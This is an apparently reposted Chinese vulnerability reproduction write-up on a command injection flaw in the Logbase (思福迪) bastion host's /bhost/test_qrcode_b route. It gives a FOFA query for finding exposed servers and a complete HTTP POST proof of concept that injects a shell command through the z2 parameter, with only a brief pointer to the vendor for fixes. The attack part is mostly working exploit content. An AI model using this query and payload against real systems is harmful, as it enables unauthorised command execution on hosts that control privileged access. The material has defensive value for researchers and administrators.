0x01 產(chǎn)品簡(jiǎn)介
思福迪運(yùn)維安全管理系統(tǒng)是思福迪開(kāi)發(fā)的一款運(yùn)維安全管理堡壘機(jī)。
0x02 漏洞概述
由于思福迪運(yùn)維安全管理系統(tǒng)?test_qrcode_b路由存在命令執(zhí)行漏洞,攻擊者可通過(guò)該漏洞在服務(wù)器端任意執(zhí)行代碼,寫(xiě)入后門(mén),獲取服務(wù)器權(quán)限,進(jìn)而控制整個(gè) web 服務(wù)器。
0x03 復(fù)現(xiàn)環(huán)境
FOFA:
((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"
0x04 漏洞復(fù)現(xiàn)
PoC
POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: close
z1=1&z2="|whoami;"&z3=bhost
0x05 修復(fù)建議
廠(chǎng)商已發(fā)布了漏洞修復(fù)程序,請(qǐng)及時(shí)關(guān)注更新:文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-759653.html
http://www.logbase.cn/文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-759653.html
到了這里,關(guān)于思福迪運(yùn)維安全管理系統(tǒng) test_qrcode_b RCE漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!